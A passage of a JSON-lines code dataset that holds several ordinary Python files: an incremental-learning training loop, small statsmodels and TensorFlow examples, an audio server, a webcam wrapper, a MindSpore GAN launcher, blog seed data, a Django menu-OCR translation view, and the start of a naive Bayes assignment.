base_classes=args.start_classes,\r\n approach= \"ft\",\r\n )\r\n\r\ntest_dataset_loader = myData.iDataLoader.IncrementalLoader(dataset.test_data,\r\n dataset.test_labels,\r\n dataset.classes,\r\n args.step_size,\r\n args.memory_size,\r\n 'test',\r\n transform=dataset.test_transform,\r\n loader=loader,\r\n shuffle_idx=shuffle_idx,\r\n base_classes=args.start_classes,\r\n approach= args.trainer,\r\n )\r\n\r\nresult_dataset_loaders = myData.iDataLoader.make_ResultLoaders(dataset.test_data,\r\n dataset.test_labels,\r\n dataset.classes,\r\n args.step_size,\r\n transform=dataset.test_transform,\r\n loader=loader,\r\n shuffle_idx = shuffle_idx,\r\n base_classes = args.start_classes\r\n )\r\n\r\n#only for the BiC\r\nbias_dataset_loader = myData.iDataLoader.IncrementalLoader(dataset.train_data,\r\n dataset.train_labels,\r\n dataset.classes,\r\n args.step_size,\r\n args.memory_size,\r\n 'bias',\r\n transform=dataset.train_transform,\r\n loader=loader,\r\n shuffle_idx=shuffle_idx,\r\n base_classes=args.start_classes,\r\n approach=args.trainer\r\n )\r\n\r\ntrain_iterator = torch.utils.data.DataLoader(train_dataset_loader, batch_size=args.batch_size, shuffle=True,\r\n drop_last=True)\r\nevaluator_iterator = torch.utils.data.DataLoader(evaluate_dataset_loader, batch_size=args.batch_size, shuffle=True)\r\ntest_iterator = torch.utils.data.DataLoader(test_dataset_loader, batch_size=50, shuffle=False)\r\n#######################################################################################################################\r\n\r\n####################################################################################Set optimizer, trainer, evaluator\r\n\r\noptimizer = optim.SGD(myNet.parameters(), args.lr, momentum=0.9,\r\n weight_decay=5e-4, nesterov=True)\r\n\r\nif args.trainer == \"icarl\" :\r\n test_type = \"generativeClassifier\"\r\nelse :\r\n testType = \"trainedClassifier\"\r\n\r\nmyTrainer = trainer.trainer_warehouse.TrainerFactory.get_trainer(train_iterator, test_iterator, dataset, myNet, args, optimizer)\r\nmyEvaluator = trainer.evaluator.EvaluatorFactory.get_evaluator(testType, classes=dataset.classes)\r\nbic_Evaluator = trainer.evaluator.EvaluatorFactory.get_evaluator(\"bic\", classes=dataset.classes)\r\n#######################################################################################################################\r\n\r\n####################################################################################etc informaation\r\n\r\n\r\ntrain_start = 0\r\ntrain_end = args.start_classes\r\ntest_start = 0\r\ntest_end = args.start_classes\r\ntotal_epochs = args.nepochs\r\nschedule = np.array(args.schedule)\r\n\r\nresults = {}\r\n\r\nfor head in ['all', 'prev_new', 'task', 'cheat']:\r\n results[head] = {}\r\n results[head]['correct'] = []\r\n results[head]['correct_5'] = []\r\n results[head]['stat'] = []\r\n\r\nresults['task_soft_1'] = np.zeros((tasknum, tasknum))\r\nresults['task_soft_5'] = np.zeros((tasknum, tasknum))\r\n\r\n\r\ncorrect_list = []\r\nstat_list = []\r\n\r\ntask_confidence_list = []\r\nget_confidence = False\r\n\r\ntask_error = []\r\n\r\n#################Get Into Incremental Learning!###############################\r\nprint(\"datset : \", args.dataset, \"| trainer : \", args.trainer, \"| kdloss : \", args.KD, \" | triplet : \", args.triplet)\r\nfor t in range(tasknum):\r\n get_confidence = False\r\n\r\n correct = {} # record for correct\r\n stat = {} # record for statistics e.g. 
ep, enn ..\r\n\r\n lr = args.lr\r\n\r\n myTrainer.update_frozen_model()\r\n myTrainer.setup_training(lr)\r\n\r\n if t > 0 and args.triplet: #make class correlation matrix\r\n if args.dict_type == \"softmax\":\r\n myTrainer.make_class_dict()\r\n\r\n print(\"SEED:\", args.seed, \"MEMORY_BUDGET:\", args.memory_size, \"tasknum:\", t)\r\n\r\n for epoch in range(args.nepochs):\r\n myTrainer.update_lr(epoch, args.schedule)\r\n myTrainer.train(epoch, triplet=args.triplet)\r\n\r\n if epoch % 5 == 4:\r\n if args.trainer == \"icarl\":\r\n myEvaluator.update_moment(myTrainer.model, evaluator_iterator, args.step_size, t)\r\n if t == 0:\r\n get_confidence = False\r\n train_1 = myEvaluator.evaluate(myTrainer.model, evaluator_iterator, 0, train_end,\r\n get_confidence=get_confidence, tasknum=tasknum)\r\n test_1 = myEvaluator.evaluate(myTrainer.model, test_iterator, test_start, test_end,\r\n mode='test', step_size=args.step_size, tasknum=tasknum)\r\n\r\n print(\"*********CURRENT EPOCH********** : %d\" % epoch)\r\n print(\"Train Classifier top-1 (Softmax): %0.2f\" % train_1)\r\n print(\"Test Classifier top-1 (Softmax): \", test_1)\r\n\r\n else:\r\n if epoch == args.nepochs - 1 & get_confidence == True:\r\n get_confidence = False\r\n train_1, confidence = myEvaluator.evaluate(myTrainer.model, evaluator_iterator, 0, train_end,\r\n get_confidence=get_confidence, tasknum=tasknum)\r\n else:\r\n train_1 = myEvaluator.evaluate(myTrainer.model, evaluator_iterator, 0, train_end,\r\n get_confidence=get_confidence, tasknum=tasknum)\r\n\r\n correct, stat = myEvaluator.evaluate(myTrainer.model, test_iterator,\r\n test_start, test_end,\r\n mode='test', step_size=args.step_size, tasknum=tasknum)\r\n\r\n print(\"Train Classifier top-1 (Softmax): %0.2f\" % train_1)\r\n print(\"Test Classifier top-1 (Softmax, all): %0.2f\" % correct['all'])\r\n print(\"Test Classifier top-1 (Softmax, pre): %0.2f\" % correct['pre'])\r\n print(\"Test Classifier top-1 (Softmax, new): %0.2f\" % correct['new'])\r\n print(\"Test Classifier top-1 (Softmax, intra_pre): %0.2f\" % correct['intra_pre'])\r\n print(\"Test Classifier top-1 (Softmax, intra_new): %0.2f\" % correct['intra_new'])\r\n\r\n if (epoch == args.anchor_update_epoch - 1) and t > 0 and args.triplet == True :\r\n myTrainer.make_class_Anchor(after_train=False) # save class anchor for next step\r\n\r\n if args.dict_update == True:\r\n if args.dict_type == \"softmax\":\r\n myTrainer.make_class_dict()\r\n else:\r\n myTrainer.make_class_dict_CS()\r\n\r\n if t > 0 and (args.trainer == 'wa' or args.trainer == \"CLT\"): #weight align for bias correction\r\n myTrainer.weight_align(new_wa=args.new_WA)\r\n correct, stat = myEvaluator.evaluate(myTrainer.model, test_iterator,\r\n test_start, test_end,\r\n mode='test', step_size=args.step_size, tasknum=tasknum)\r\n print(\"Test Classifier top-1 (Softmax, all): %0.2f\" % correct['all'])\r\n print(\"Test Classifier top-1 (Softmax, pre): %0.2f\" % correct['pre'])\r\n print(\"Test Classifier top-1 (Softmax, new): %0.2f\" % correct['new'])\r\n print(\"Test Classifier top-1 (Softmax, intra_pre): %0.2f\" % correct['intra_pre'])\r\n print(\"Test Classifier top-1 (Softmax, intra_new): %0.2f\" % correct['intra_new'])\r\n\r\n if t > 0 and (args.trainer == 'eeil'): #balanced finutning fot EEIL\r\n myTrainer.balance_fine_tune()\r\n correct, stat = myEvaluator.evaluate(myTrainer.model, test_iterator,\r\n test_start, test_end,\r\n mode='test', step_size=args.step_size, tasknum=tasknum)\r\n print(\"Test Classifier top-1 (Softmax, all): %0.2f\" % correct['all'])\r\n 
print(\"Test Classifier top-1 (Softmax, pre): %0.2f\" % correct['pre'])\r\n print(\"Test Classifier top-1 (Softmax, new): %0.2f\" % correct['new'])\r\n print(\"Test Classifier top-1 (Softmax, intra_pre): %0.2f\" % correct['intra_pre'])\r\n print(\"Test Classifier top-1 (Softmax, intra_new): %0.2f\" % correct['intra_new'])\r\n print(\"Test Classifier top-1 (Softmax, ti_correct): %0.2f\" % correct['task_id_correct'])\r\n\r\n if args.trainer == 'bic' and t > 0:\r\n\r\n best_acc = 0\r\n\r\n bias_iterator = myData.iDataLoader.iterator(bias_dataset_loader, batch_size=args.batch_size, shuffle=True)\r\n\r\n print(myTrainer.bias_correction_layer.alpha)\r\n print(myTrainer.bias_correction_layer.beta)\r\n\r\n for e in range(args.nepochs * 2):\r\n myTrainer.train_bias_correction(bias_iterator)\r\n myTrainer.update_bias_lr(e, schedule)\r\n\r\n if e % 5 == (4):\r\n correct, stat = bic_Evaluator.evaluate(myTrainer.model, test_iterator,\r\n test_start, test_end, myTrainer.bias_correction_layer,\r\n mode='test', step_size=args.step_size)\r\n print(\"Test Classifier top-1 (Softmax, all): %0.2f\" % correct['all'])\r\n print(\"Test Classifier top-1 (Softmax, pre): %0.2f\" % correct['pre'])\r\n print(\"Test Classifier top-1 (Softmax, new): %0.2f\" % correct['new'])\r\n print(\"Test Classifier top-1 (Softmax, intra_pre): %0.2f\" % correct['intra_pre'])\r\n print(\"Test Classifier top-1 (Softmax, intra_new): %0.2f\" % correct['intra_new'])\r\n\r\n correct, stat = bic_Evaluator.evaluate(myTrainer.model, test_iterator,\r\n test_start, test_end, myTrainer.bias_correction_layer,\r\n mode='test', step_size=args.step_size)\r\n print(\"Test Classifier top-1 (Softmax, all): %0.2f\" % correct['all'])\r\n print(\"Test Classifier top-1 (Softmax, pre): %0.2f\" % correct['pre'])\r\n print(\"Test Classifier top-1 (Softmax, new): %0.2f\" % correct['new'])\r\n print(\"Test Classifier top-1 (Softmax, intra_pre): %0.2f\" % correct['intra_pre'])\r\n print(\"Test Classifier top-1 (Softmax, intra_new): %0.2f\" % correct['intra_new'])\r\n\r\n if args.triplet == True :\r\n if t > 0 :\r\n myTrainer.make_class_Anchor(after_train=False) # save class anchor for next step\r\n else :\r\n myTrainer.make_class_Anchor()\r\n\r\n if t > 0:\r\n correct, stat = myEvaluator.evaluate(myTrainer.model, test_iterator,\r\n test_start, test_end,\r\n mode='test', step_size=args.step_size, tasknum=tasknum)\r\n for head in ['all', 'pre', 'new', 'intra_pre', 'intra_new']:\r\n results['all']['correct'].append(correct[head])\r\n results['all']['stat'].append(stat['all'])\r\n\r\n else:\r\n test_1 = myEvaluator.evaluate(myTrainer.model, test_iterator, test_start, test_end,\r\n mode='test', step_size=args.step_size, tasknum=tasknum)\r\n print(\"Test Classifier top-1 (Softmax): \", test_1)\r\n for head in ['all']:\r\n results[head]['correct'].append(test_1)\r\n\r\n start = 0\r\n end = args.start_classes\r\n\r\n correct_list.append(correct)\r\n stat_list.append(stat)\r\n\r\n if args.triplet == True:\r\n torch.save(myNet.state_dict(),\r\n './checkpoint/comparasion/' + 'base_{}_{}_tri{}_trilam{}_newWA{}_{}_{}_{}.pt'.format(args.trainer,\r\n args.dataset,\r\n args.triplet,\r\n args.triplet_lam,\r\n args.new_WA,\r\n tasknum, t, args.model))\r\n else:\r\n torch.save(myNet.state_dict(),\r\n './checkpoint/comparasion/' + '20_base_{}_{}_tri{}_newWA{}_{}_{}_{}.pt'.format(args.trainer, args.dataset,\r\n args.triplet, args.new_WA,\r\n tasknum, t, args.model))\r\n\r\n myTrainer.increment_classes(mode=\"Bal\", bal=\"None\", memory_mode=None)\r\n\r\n 
evaluate_dataset_loader.update_exemplar()\r\n    evaluate_dataset_loader.task_change()\r\n\r\n    # for bic\r\n    bias_dataset_loader.update_exemplar()\r\n    bias_dataset_loader.task_change()\r\n\r\n    train_end = train_end + args.step_size\r\n    test_end = test_end + args.step_size\r\n\r\nprint(args)\r\nprint()\r\nprint(\"print acc\")\r\nfor i in range(tasknum):\r\n    if i == 0:\r\n        print(test_1)\r\n    else:\r\n        print(correct_list[i][\"all\"])\r\n\r\nprint()\r\nprint(\"print all\")\r\nfor i in range(tasknum):\r\n    if i == 0:\r\n        print(test_1)\r\n    else:\r\n        print(correct_list[i][\"intra_pre\"], \" \", correct_list[i][\"intra_new\"], \" \", correct_list[i][\"pre\"], \" \",\r\n              correct_list[i][\"new\"], \" \", correct_list[i][\"task_id_correct\"])","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"206518186","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport pandas as pd\nimport statsmodels.api as sm\n\ndf = pd.read_csv(\"data/simple.csv\")\nintercept = \"intercept\"\ndf[intercept] = 1\nresults = sm.OLS(df[\"b\"], df[[intercept, \"a\"]]).fit()\nprint(results.summary())\n","sub_path":"simple-sim.py","file_name":"simple-sim.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"606434421","text":"#coding=utf-8\n\nimport tensorflow as tf\n\n# Create a variable, initialized to scalar 0\nstate = tf.Variable(0, name='counter')\n\n'''Build the graph'''\n# Create a constant op\none = tf.constant(1)\n# Create an add op\nnew_value = tf.add(state, one)\n# Create an assign op\nupdate = tf.assign(state, new_value)\n# Create an initialize_all_variables op\ninit_op = tf.initialize_all_variables()\n\n'''Launch the default graph in a session'''\nwith tf.Session() as sess:\n    # Run the init op\n    sess.run(init_op)\n    # Run the op to update state\n    for _ in range(10):\n        sess.run(update)\n        # Fetch the result\n        print(sess.run(state))\n","sub_path":"practice_framework_tensorflow/04-使用变量实现一个简单的计数器.py","file_name":"04-使用变量实现一个简单的计数器.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"23418323","text":"import pyaudio\nimport Queue\nimport numpy\nimport threading\nimport time\nfrom audio_group import AudioGroup\nfrom audio_block import AudioBlock\nimport mido\n\nclass MidiThread(threading.Thread):\n    def __init__(self):\n        super(MidiThread, self).__init__()\n        self.midi_queue = Queue.PriorityQueue()\n        self.midi_output = mido.open_output(name=\"BlockAudio\", virtual=True)\n        self.should_exit = False\n        self.paused = False\n        self.start()\n\n    def run(self):\n        item = None\n        while not self.should_exit:\n            if not self.paused:\n                if item is None:\n                    try:\n                        item = self.midi_queue.get(block=False)\n                    except Queue.Empty:\n                        item = None\n                if item:\n                    if item[0]<=time.time():\n                        self.midi_output.send(item[1])\n                        item = None\n            time.sleep(.01)\n\n    def close(self):\n        self.should_exit = True\n        if self.is_alive():\n            self.join()\n\nclass AudioServer(threading.Thread):\n    PaManager = None\n    Servers = []\n    DefaultBufferMult = .99\n\n    @staticmethod\n    def get_default():\n        if AudioServer.Servers:\n            return AudioServer.Servers[0]\n        server = AudioServer()\n        server.play()\n        return server\n\n    @staticmethod\n    def close_all():\n        while len(AudioServer.Servers)>0:\n            server = AudioServer.Servers[0]\n            server.close()\n        del AudioServer.Servers[:]\n\n    def __init__(self, buffer_mult=DefaultBufferMult, host_api_name=\"jack\"):\n        super(AudioServer, self).__init__()\n        
self.midi_thread = MidiThread()\n self.pa_manager = pyaudio.PyAudio()\n\n self.output_device_index = None\n for i in xrange(self.pa_manager.get_host_api_count()):\n host_api_info = self.pa_manager.get_host_api_info_by_index(i)\n if host_api_info[\"name\"].lower().find(host_api_name.lower()) == -1:\n continue\n for j in xrange(host_api_info[\"deviceCount\"]):\n device_info = self.pa_manager.get_device_info_by_host_api_device_index(i, j)\n if device_info[\"maxOutputChannels\"]<2:\n continue\n self.output_device_index = device_info[\"index\"]\n\n self.audio_queue = Queue.Queue()\n self.block_positions_queue = Queue.Queue()\n self.audio_group = AudioGroup()\n self.should_exit = False\n self.paused = False\n self.set_buffer_mult(buffer_mult)\n self.stream = None\n AudioServer.Servers.append(self)\n self.start()\n\n def play(self, block=None):\n self.paused = False\n if block:\n block.play()\n self.audio_group.play()\n\n def add_block(self, block):\n self.audio_group.add_block(block)\n\n def remove_block(self, block):\n self.audio_group.remove_block(block)\n\n def get_latency(self):\n return self.stream.get_output_latency()\n\n def set_buffer_mult(self, mult):\n self.buffer_mult = mult\n buffer_time = AudioBlock.FramesPerBuffer/float(AudioBlock.SampleRate)\n self.period = max(buffer_time*self.buffer_mult, .001)\n\n def run(self):\n self.stream = self.pa_manager.open(\n format=pyaudio.paFloat32,\n channels=AudioBlock.ChannelCount,\n rate= int(AudioBlock.SampleRate),\n output=True,\n frames_per_buffer = AudioBlock.FramesPerBuffer,\n stream_callback=self.stream_callback,\n output_device_index=self.output_device_index)\n self.audio_group.play()\n last_time = 0\n block_positions = None\n played_at = None\n while not self.should_exit:\n if block_positions is None:\n try:\n block_positions, played_at = self.block_positions_queue.get(block=False)\n except Queue.Empty:\n pass\n if block_positions and played_at<=time.time():\n for block, pos in block_positions:\n block.play_pos = pos\n block_positions = None\n\n if (time.time()-last_time)>self.period and not self.paused:\n audio_message = self.audio_group.get_samples(AudioBlock.FramesPerBuffer)\n if audio_message is not None:\n if audio_message.samples is not None:\n self.audio_queue.put(audio_message, block=True)\n\n last_time = time.time()\n time.sleep(self.period)\n self.stream.stop_stream()\n self.stream.close()\n\n def stream_callback(self, in_data, frame_count, time_info, status):\n if self.paused:\n data = self.audio_group.blank_data.copy()\n else:\n try:\n audio_message = self.audio_queue.get(block=False)\n data = audio_message.samples\n if data is None:\n data = self.audio_group.blank_data.copy()\n if audio_message.midi_messages:\n for midi_message in audio_message.midi_messages:\n self.midi_thread.midi_queue.put((\n time.time()+(midi_message.delay*1./AudioBlock.SampleRate),\n midi_message.mido_message\n ))\n if audio_message.block_positions:\n played_at = time_info[\"output_buffer_dac_time\"]+time.time()\n self.block_positions_queue.put(\n (audio_message.block_positions, played_at))\n\n self.audio_queue.task_done()\n except Queue.Empty:\n data = self.audio_group.blank_data.copy()\n return (data, pyaudio.paContinue)\n\n def close(self):\n self.midi_thread.close()\n self.should_exit = True\n if self.is_alive():\n self.join()\n AudioServer.Servers.remove(self)\n 
self.pa_manager.terminate()\n","sub_path":"src/audio_blocks/audio_server.py","file_name":"audio_server.py","file_ext":"py","file_size_in_byte":6057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"365137390","text":"import cv2\n\n\nclass MyVideoCapture:\n def __init__(self, video_source=0):\n self.video_source = video_source\n self.vid = None\n self.width = None\n self.height = None\n self.init()\n\n def init(self):\n # Open the video source\n self.vid = cv2.VideoCapture(self.video_source)\n if not self.vid.isOpened():\n print(\"Unable to open video source\")\n raise ValueError(\"Unable to open video source\", self.video_source)\n\n self.width = self.vid.get(cv2.CAP_PROP_FRAME_WIDTH)\n self.height = self.vid.get(cv2.CAP_PROP_FRAME_HEIGHT)\n\n def get_frame(self):\n if self.vid.isOpened():\n ret, frame = self.vid.read()\n if ret:\n # Return a boolean success flag and the current frame converted to BGR\n return (ret, cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))\n else:\n print(\"Ret not found\")\n return (ret, None)\n else:\n print(\"get_frame Not opened\")\n return (None)\n\n # Release the video source when the object is destroyed\n def __del__(self):\n print(\"Camera capture released\")\n if self.vid.isOpened():\n self.vid.release()\n\n def release_camera(self):\n print(\"Camera capture released\")\n if self.vid.isOpened():\n self.vid.release()\n\n\nDEFAULT_VIDEO_CAPTURE = MyVideoCapture(0)\n","sub_path":"app_tools/my_video_capture.py","file_name":"my_video_capture.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"204719536","text":"# Copyright 2022 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"\nlaunch file for traning and testing on Ascend 910\n\"\"\"\nimport os\nimport time\n\nimport mindspore\nfrom mindspore import context\nfrom mindspore.communication import init, get_group_size\nfrom mindspore.context import ParallelMode\n\nfrom src.modelarts_utils.config import config\nfrom src.modelarts_utils.moxing_adapter import moxing_wrapper\nfrom src.models.UGATIT import UGATIT\nfrom src.utils.tools import check_folder\n\nmindspore.set_seed(1)\n\n@moxing_wrapper()\ndef main():\n # parse arguments\n\n if config.distributed:\n if config.device_target == 'Ascend':\n device_id = int(os.getenv('DEVICE_ID'))\n device_num = int(os.getenv('RANK_SIZE'))\n context.set_context(mode=context.GRAPH_MODE,\n device_target=config.device_target,\n device_id=device_id,\n save_graphs=config.save_graphs,\n save_graphs_path=config.graph_path)\n init()\n context.set_auto_parallel_context(parallel_mode=ParallelMode.DATA_PARALLEL,\n gradients_mean=True,\n device_num=device_num)\n elif config.device_target == 'GPU':\n init(\"nccl\")\n context.reset_auto_parallel_context()\n device_num = get_group_size()\n 
context.set_auto_parallel_context(device_num=device_num, parallel_mode=ParallelMode.DATA_PARALLEL,\n gradients_mean=True)\n else:\n raise ValueError(\"Wrong device\", config.device_target)\n else:\n context.set_context(mode=context.GRAPH_MODE,\n device_target=config.device_target,\n device_id=int(config.device_id),\n save_graphs=config.save_graphs,\n save_graphs_path=config.graph_path)\n\n check_folder(os.path.join(config.output_path, config.dataset, 'model'))\n check_folder(os.path.join(config.output_path, config.dataset, 'img'))\n check_folder(os.path.join(config.output_path, config.dataset, 'test'))\n check_folder(config.graph_path)\n # open session\n gan = UGATIT(config)\n\n # build graph\n start_time = time.time()\n gan.build_model()\n print(\"build_model cost time: %.4f\" % (time.time() - start_time))\n\n gan.train()\n print(\" [*] Training finished!\")\n\nif __name__ == '__main__':\n main()\n","sub_path":"research/cv/U-GAT-IT/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"224945307","text":"from models import Base, Role, User, Tag, Post, Post_Tag\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\nengine = create_engine('sqlite:///flogger.db')\nBase.metadata.bind = engine\n\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\nnewRole = Role(\n name=\"Administrator\",\n description=\"User with full control of the site.\"\n)\nsession.add(newRole)\n\nnewUser = User(\n username=\"Admin\",\n email=\"admin@site.com\",\n picture=\"placeholder.jpg\",\n role_id=1\n)\nsession.add(newUser)\n\nnewTag = Tag(name=\"Uncategorized\")\nsession.add(newTag)\n\nnewPost = Post(\n title=\"Welcome!\",\n body=\"Welcome to your blog!\",\n creator_id=1\n)\nsession.add(newPost)\n\nnewRel = Post_Tag(\n post_id=1,\n tag_id=1\n)\nsession.add(newRel)\n\nsession.commit()\n","sub_path":"dummy_data.py","file_name":"dummy_data.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"178052550","text":"import io\nimport math\nfrom enum import Enum\n\nimport six\nfrom google.cloud import translate_v2 as translate\nfrom google.cloud import vision\nfrom PIL import Image, ImageDraw\nfrom rest_framework import status, viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\n\nfrom apps.menu import serializers\nfrom apps.menu.models import Menu\nfrom conf.settings import MEDIA_ROOT\n\n\nclass FeatureType(Enum):\n PAGE = 1\n BLOCK = 2\n PARA = 3\n WORD = 4\n SYMBOL = 5\n\n\ndef translate_text_print(target, text):\n \"\"\"Translates text into the target language.\n\n Target must be an ISO 639-1 language code.\n See https://g.co/cloud/translate/v2/translate-reference#supported_languages\n \"\"\"\n\n translate_client = translate.Client()\n\n if isinstance(text, six.binary_type):\n text = text.decode(\"utf-8\")\n\n # Text can also be a sequence of strings, in which case this method\n # will return a sequence of results for each text.\n result = translate_client.translate(text, target_language=target)\n\n print(u\"Text: {}\".format(result[\"input\"]))\n print(u\"Translation: {}\".format(result[\"translatedText\"]))\n print(u\"Detected source language: \\\n {}\".format(result[\"detectedSourceLanguage\"]))\n\n\ndef translate_all_text(target, text):\n \"\"\"Translates text into the target language.\n\n Target must be an ISO 
639-1 language code.\n See https://g.co/cloud/translate/v2/translate-reference#supported_languages\n \"\"\"\n\n translate_client = translate.Client()\n\n result_text = []\n\n # Text can also be a sequence of strings, in which case this method\n # will return a sequence of results for each text.\n n_text = len(text)\n # print(n_text)\n num_executions = math.ceil(n_text / 120)\n # print(num_executions)\n for i in range(0, num_executions):\n # print(i)\n pos = i * 120\n # print(pos)\n end_pos = pos + 120\n if (pos + 120) > n_text:\n end_pos = n_text\n else:\n end_pos = pos + 120\n # print(end_pos)\n text_to_translate = text[(pos):(end_pos)]\n result = translate_client.translate(\n text_to_translate, target_language=target\n )\n # print(result)\n for t in result:\n result_text.append(t[\"translatedText\"])\n\n return result_text\n\n\ndef translate_text(target, text):\n \"\"\"Translates text into the target language.\n\n Target must be an ISO 639-1 language code.\n See https://g.co/cloud/translate/v2/translate-reference#supported_languages\n \"\"\"\n\n translate_client = translate.Client()\n\n if isinstance(text, six.binary_type):\n text = text.decode(\"utf-8\")\n\n # Text can also be a sequence of strings, in which case this method\n # will return a sequence of results for each text.\n result = translate_client.translate(text, target_language=target)\n\n return result[\"translatedText\"]\n\n\ndef draw_boxes(image, bounds, color):\n \"\"\"Draw a border around the image using the hints in the vector list.\"\"\"\n draw = ImageDraw.Draw(image)\n\n aux = 0\n for bound in bounds:\n if aux != 0:\n draw.polygon([\n bound.vertices[0].x, bound.vertices[0].y,\n bound.vertices[1].x, bound.vertices[1].y,\n bound.vertices[2].x, bound.vertices[2].y,\n bound.vertices[3].x, bound.vertices[3].y],\n fill=(255, 255, 255, 128), outline=color\n )\n aux = 1\n return image\n\n\ndef draw_text(image, bounds, texts, color):\n \"\"\"Draw text in the image \"\"\"\n draw = ImageDraw.Draw(image)\n\n aux = 0\n for bound in bounds:\n if (aux != 0):\n draw.text(\n (bound.vertices[0].x, bound.vertices[0].y),\n str(texts[aux]).encode('utf-8'),\n fill=\"black\", anchor=\"ms\"\n )\n aux += 1\n\n return image\n\n\ndef get_document_bounds(image_file, feature, lang):\n \"\"\"Returns document bounds given an image.\"\"\"\n client = vision.ImageAnnotatorClient()\n\n bounds = []\n texts = []\n texts_ = []\n translates = []\n\n with io.open(image_file, 'rb') as image_file:\n content = image_file.read()\n\n image = vision.Image(content=content)\n\n response = client.document_text_detection(image=image)\n datas = response.text_annotations\n\n # general_description = datas[0].description\n # print(datas)\n # print(general_description)\n\n # translate_text_print(lang, general_description)\n\n for text in datas:\n texts_.append(text.description)\n texts.append(text.description)\n bounds.append(text.bounding_poly)\n\n translates = translate_all_text(lang, texts_)\n\n # The list `bounds` contains the coordinates of the bounding boxes.\n return bounds, texts, translates\n\n\ndef render_doc_text(filein, fileout, lang):\n image = Image.open(filein)\n bounds, texts, translates = get_document_bounds(\n filein, FeatureType.WORD, lang\n )\n draw_boxes(image, bounds, 'yellow')\n draw_text(image, bounds, translates, 'yellow')\n\n if fileout != 0:\n image.save(fileout)\n else:\n image.show()\n return translates, texts\n\n\nclass MenuViewSet(viewsets.ModelViewSet):\n \"\"\"Manage menu in the database\"\"\"\n serializer_class = 
serializers.MenuImageSerializer\n    queryset = Menu.objects.all()\n\n    @action(methods=['POST'], detail=False, url_path='upload')\n    def upload(self, request):\n        serializer = self.get_serializer(\n            data=request.data\n        )\n\n        if serializer.is_valid():\n            # print(request.data)\n            serializer.save()\n            # print(serializer.data['id'])\n\n            image_ = Menu.objects.get(id=serializer.data['id'])\n            image_path = image_.image.path\n            image_name = image_.image.name\n\n            lang = serializer.data['lang']\n\n            # print(image_path)\n            # print(image_name)\n\n            r_lang, r_text = render_doc_text(\n                image_path, MEDIA_ROOT + '/' + image_name, lang\n            )\n\n            image_.description = r_lang[0]\n            image_.original = r_text[0]\n            image_.save()\n\n            seria = serializers.MenuImageSerializer(image_)\n\n            return Response(\n                seria.data,\n                status=status.HTTP_200_OK\n            )\n\n        return Response(\n            serializer.errors,\n            status=status.HTTP_400_BAD_REQUEST\n        )\n","sub_path":"apps/menu/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"501158976","text":"#-------------------------------------------------------------------------\r\n# AUTHOR : Andy Vu\r\n# FILENAME : naive_bayes.py\r\n# SPECIFICATION : Outputs the classification of each test instance if the\r\n# classification confidence is >= 0.75\r\n# FOR : CS 4210 - Assignment #2\r\n# TIME SPENT : 02/27/2021-02/28/2021\r\n#-----------------------------------------------------------*/\r\n\r\n# IMPORTANT NOTE: DO NOT USE ANY ADVANCED PYTHON LIBRARY TO COMPLETE THIS CODE SUCH AS numpy OR pandas. You have to work here only with standard vectors and arrays\r\n\r\n# importing some Python libraries\r\nimport csv\r\nfrom sklearn.naive_bayes import GaussianNB\r\n\r\n# reading the training data\r\n# --> add your Python code here\r\nweatherTraining = []\r\nwith open('weather_training.csv', 'r') as csvfile:\r\n    reader = csv.reader(csvfile)\r\n    for i, row in enumerate(reader):\r\n        if i > 0: # skipping the header\r\n            weatherTraining.append(row)\r\n\r\n# transform the original training features to numbers and add to the 4D array X.\r\n# For instance Sunny = 1, Overcast = 2, Rain = 3, so X = [[3, 1, 1, 2], [1, 3, 2, 2], ...]]\r\n# --> add your Python code here\r\n# Day : Sunny = 1, Overcast = 2, Rain = 3\r\n# Temperature: Hot = 1, Mild = 2, Cool = 3\r\n# Humidity : High = 1, Normal = 2\r\n# Wind : Weak = 1, Strong = 2\r\nX = []\r\nfor row in weatherTraining:\r\n    temp = []\r\n    for i in range(1, 5):\r\n        if row[i] == \"Sunny\" or row[i] == \"Hot\" or row[i] == \"High\" or row[i] == \"Weak\":\r\n            temp.append(1)\r\n        elif row[i] == \"Overcast\" or row[i] == \"Mild\" or row[i] == \"Normal\" or row[i] == \"Strong\":\r\n            temp.append(2)\r\n        else:\r\n            temp.append(3)\r\n    X.append(temp)\r\n\r\n# transform the original training classes to numbers and add to the vector Y.\r\n# For instance Yes = 1, No = 2, so Y = [1, 1, 2, 2, ...]\r\n# --> add your Python code here\r\nY = []\r\nfor row in weatherTraining:\r\n    if row[-1] == \"Yes\":\r\n        Y.append(1)\r\n    else:\r\n        Y.append(2)\r\n\r\n# fitting the naive bayes to the data\r\nclf = GaussianNB()\r\nclf.fit(X, Y)\r\n\r\n# reading the data in a csv file\r\n# 